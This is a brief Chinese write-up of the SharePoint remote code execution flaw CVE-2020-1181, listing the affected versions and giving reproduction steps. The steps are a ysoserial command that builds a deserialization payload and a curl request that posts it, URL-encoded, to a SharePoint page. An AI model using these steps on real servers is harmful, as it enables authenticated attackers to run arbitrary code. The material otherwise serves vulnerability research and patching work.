# (CVE-2020-1181)Microsoft SharePoint 远程代码执行漏洞
==============
一、漏洞简介
————
`SharePoint Portal Server`
是一套门户网站解决方案,使得企业能够便捷地开发出智能的门户网站,能够无缝连接到用户、团队和知识。因此用户能够更好地利用业务流程中的相关信息,更有效地开展工作。
当`Microsoft SharePoint Server`无法正确识别和过滤不安全的`ASP.Net Web`控件时,将会存在一处远程代码执行漏洞。成功利用此漏洞的远程攻击者(需要身份验证)通过创建特制的页面,可以在`SharePoint`应用进程池的上下文中执行任意代码。
二、漏洞影响
————
Microsoft SharePoint Enterprise Server 2016Microsoft SharePoint Foundation 2010 Service Pack 2Microsoft SharePoint Foundation 2013 Service Pack 1Microsoft SharePoint Server 2019
三、复现过程
————
ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c cale.exe
![1.png](/static/qingy/(CVE-2020-1181)Microsoft_SharePoint_远程代码执行漏洞/img/rId24.png)
替换掉poc.xml内的payload
> Poc.xml
通过 `curl -L -v –ntlm –negotiate “https://www.0-sec.org/_layouts/15/quicklinksdialogform.aspx?Mode=Suggestion” –data “viewstate=&__SUGGESTIONSCHACHE=urlencode(poc.xml)”`
![2.png](/static/qingy/(CVE-2020-1181)Microsoft_SharePoint_远程代码执行漏洞/img/rId25.png)
触发漏洞,执行命令
请登录后查看评论内容